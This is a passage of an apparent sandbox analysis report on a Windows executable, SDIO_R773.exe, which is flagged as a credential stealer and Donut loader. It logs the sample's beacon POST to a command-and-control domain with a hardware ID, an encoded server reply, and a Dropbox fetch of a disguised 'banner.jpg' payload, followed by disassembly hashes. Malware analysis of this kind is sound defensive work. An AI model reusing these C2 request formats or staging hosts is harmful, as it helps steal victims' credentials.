                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1675&rtt_var=631&sent=350&recv=606&lost=0&retrans=0&sent_bytes=2839&recv_bytes=592592&delivery_rate=1730883&cwnd=155&unsent_bytes=0&cid=3dc73bf906c7bcff&ts=1950&x=0"


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.449747104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:34 UTC353OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            Cookie: __cf_mw_byp=.3qNnW7B5PvVpXQQ4.UjY.DbaYunewo_Wyf0Mx12mTc-1736592972-0.0.1.1-/api
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 79
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:34 UTC79OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 32 26 6a 3d 26 68 77 69 64 3d 34 44 35 37 34 38 30 44 41 36 45 43 46 46 44 34 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=BbL7Kk--02&j=&hwid=4D57480DA6ECFFD4E2FCF1EEA745798E
                                                                                                                                                                                                                                            2025-01-11 10:56:34 UTC1118INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:34 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=glrfk5b9c0b9fobohdcefs2ok0; expires=Wed, 07 May 2025 04:43:13 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdZMPEMNkWdHQbyifwx9pzmXPUAZ7F448VEMYwyzj9RcMrTY7ku3MTRDwLBmG2sD%2BXVBbhPrf5nTSc9mLhLS1BHwFzSZeEEMEDrbL7WHs2sbBj0pudSgtWUpkiZB9CtUPZjK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 900461854dff7c6a-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1962&rtt_var=740&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1068&delivery_rate=1475492&cwnd=218&unsent_bytes=0&cid=02b304c69de5b9e2&ts=462&x=0"
                                                                                                                                                                                                                                            2025-01-11 10:56:34 UTC251INData Raw: 66 38 0d 0a 6f 61 76 66 55 35 4f 33 67 61 6b 77 55 5a 2b 50 6f 37 51 4f 6b 77 7a 6e 54 53 34 56 37 31 6c 4c 68 78 50 73 4e 57 48 32 4f 53 6a 36 30 50 30 6d 73 59 32 6a 77 55 51 6c 37 2f 79 5a 36 43 48 50 49 35 41 36 57 54 75 4c 4b 79 54 33 63 59 4e 4e 54 35 56 57 52 66 32 45 72 44 44 2f 36 36 37 50 57 51 32 77 2b 39 6e 44 4f 71 55 39 6c 69 73 61 49 59 45 34 4a 76 42 38 6e 45 63 56 68 31 41 5a 2f 59 53 38 4f 2f 4c 5a 37 38 78 63 49 71 75 39 6c 2b 74 73 38 6d 4b 4a 4b 46 77 37 68 53 6b 73 75 47 47 41 58 67 53 50 42 45 2f 47 33 4b 31 71 70 73 54 74 77 51 6c 6a 2b 62 32 58 33 6d 44 31 5a 6f 34 2f 52 47 79 56 49 44 69 68 59 4a 67 49 57 59 4a 41 55 64 75 65 73 47 53 31 30 2b 32 55 41 58 4f 7a 72 63 58 41 4c 4b 6b 38 79 32 39 4c 4e 39 56 70 4e 74 6f
                                                                                                                                                                                                                                            Data Ascii: f8oavfU5O3gakwUZ+Po7QOkwznTS4V71lLhxPsNWH2OSj60P0msY2jwUQl7/yZ6CHPI5A6WTuLKyT3cYNNT5VWRf2ErDD/667PWQ2w+9nDOqU9lisaIYE4JvB8nEcVh1AZ/YS8O/LZ78xcIqu9l+ts8mKJKFw7hSksuGGAXgSPBE/G3K1qpsTtwQlj+b2X3mD1Zo4/RGyVIDihYJgIWYJAUduesGS10+2UAXOzrcXALKk8y29LN9VpNto
                                                                                                                                                                                                                                            2025-01-11 10:56:34 UTC3INData Raw: 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: =
                                                                                                                                                                                                                                            2025-01-11 10:56:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            9192.168.2.449748162.125.66.184437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:35 UTC290OUTGET /scl/fi/tzw461qf44namwoprtqi1/channels424_banner.jpg?rlkey=ggwr95slh92f24jnfjirjyzys&st=8tyyz5o7&dl=1 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: www.dropbox.com
                                                                                                                                                                                                                                            2025-01-11 10:56:36 UTC4261INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Content-Security-Policy: form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https [TRUNCATED]
                                                                                                                                                                                                                                            Content-Security-Policy: report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-dynamic ; script-src 'unsafe-eval' 'strict-dynamic' 'nonce-SIs+rPrP3KYvK5g0EjVvZjT67gE=' 'nonce-Or+ZDAYwRQ2id8utyu+MWkyzUbI='
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Location: https://uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com/cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1#
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                            Set-Cookie: gvc=MjgyNDkyNDI3NDAxODcyODUyNDEwMTcxNTA4NTMxMzI0NDUyOTM5; Path=/; Expires=Thu, 10 Jan 2030 10:56:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: t=CJ8LyDGQCmNILsPH3L1AS_WA; Path=/; Domain=dropbox.com; Expires=Sun, 11 Jan 2026 10:56:35 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: __Host-js_csrf=CJ8LyDGQCmNILsPH3L1AS_WA; Path=/; Expires=Sun, 11 Jan 2026 10:56:35 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: __Host-ss=tD-wJ70rT0; Path=/; Expires=Sun, 11 Jan 2026 10:56:35 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                            Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Thu, 10 Jan 2030 10:56:35 GMT
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                            X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                            X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                            Content-Length: 17
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:35 GMT
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                            Server: envoy
                                                                                                                                                                                                                                            Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                            X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                            X-Dropbox-Request-Id: 79515ab1b4684a798833d4306d5120c7
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-11 10:56:36 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                            Data Ascii: ...status=302-->


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            10192.168.2.449749162.125.66.154437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:36 UTC401OUTGET /cd/0/get/Ch9Eke8i0BLC3-DtINknVGtnjncus_u99HdagMMMzqS1C8VzqEY5PQ_JhjusgWHY1s4INYrDYXnP6n3C2obINdgOZAzOWbQcf4GGcylpLcMkiO54nwiWjM6mWgFeR2Srg4dg3ZC_YHliUlRXW1veRWN7/file?dl=1# HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com
                                                                                                                                                                                                                                            2025-01-11 10:56:37 UTC203INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                            Content-Length: 1005
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            X-Dropbox-Response-Origin: local
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:36 GMT
                                                                                                                                                                                                                                            Server: envoy
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-11 10:56:37 UTC1005INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 44 72 6f 70 62 6f 78 20 2d 20 34 30 30 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 66 6c 2e 64 72 6f 70 62 6f 78 73 74 61 74 69 63 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 6d 65 74 61 73 65 72 76 65
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Dropbox - 400</title><link href="https://cfl.dropboxstatic.com/static/metaserve


                                                                                                                                                                                                                                            Statistics

                                                                                                                                                                                                                                            CPU Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Memory Usage

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            System Behavior

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:05:55:57
                                                                                                                                                                                                                                            Start date:11/01/2025
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SDIO_R773.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:5'304'144 bytes
                                                                                                                                                                                                                                            MD5 hash:C45A36EC4B4F8D8412C60DB459C2B9D2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                                              Function 047F85DE Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.2005511559.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Offset: 047F2000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_47f2000_SDIO_R773.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: HoW+
                                                                                                                                                                                                                                              • API String ID: 0-1697190144
                                                                                                                                                                                                                                              • Opcode ID: 13994b12b4fc34cb012bc3bd243ab28f79f5bcfa59e5594994d2b880dd266e5d
                                                                                                                                                                                                                                              • Instruction ID: 8f857be9b54b2b2a6a24ae896bd5a94ca14680f0c32d58a2d17755d7cd140d56
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13994b12b4fc34cb012bc3bd243ab28f79f5bcfa59e5594994d2b880dd266e5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF61FC31009AD19BC717DF38CAA5A96BFAABF0331071E4AC9D8C14E363C3656601C767
                                                                                                                                                                                                                                              Function 047F85BD Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.2005511559.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Offset: 047F2000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_47f2000_SDIO_R773.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1e8121e5cbfaa198bff0f2e31f5adb49ceb4744afcd63d24e6bcc92b1e3b2c83
                                                                                                                                                                                                                                              • Instruction ID: 7bd526c6cee56b6d5d26e722299fd1d58f2fc104ac2bfcb0912ee034779f8eaa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e8121e5cbfaa198bff0f2e31f5adb49ceb4744afcd63d24e6bcc92b1e3b2c83
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C58140310096D18BC7179F38CEA5696BFA5BF03324B1E4AC9D8C18E7A3C3256544C7AB
                                                                                                                                                                                                                                              Function 047F860F Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000003.2005511559.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Offset: 047F2000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_3_47f2000_SDIO_R773.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: ab7014894d25b384b5a63ef30bd28e265c2608602d0bdf3d51d324961ae4c5ea
                                                                                                                                                                                                                                              • Instruction ID: 998830a9a7312b676f01ac62679ecb9c39c706b80665dfdce35098025f7732c0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab7014894d25b384b5a63ef30bd28e265c2608602d0bdf3d51d324961ae4c5ea
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5461DB35009AC19FC717DF78DAA56A6BFAABB0331071E4AC9D4C14D363C3656600C767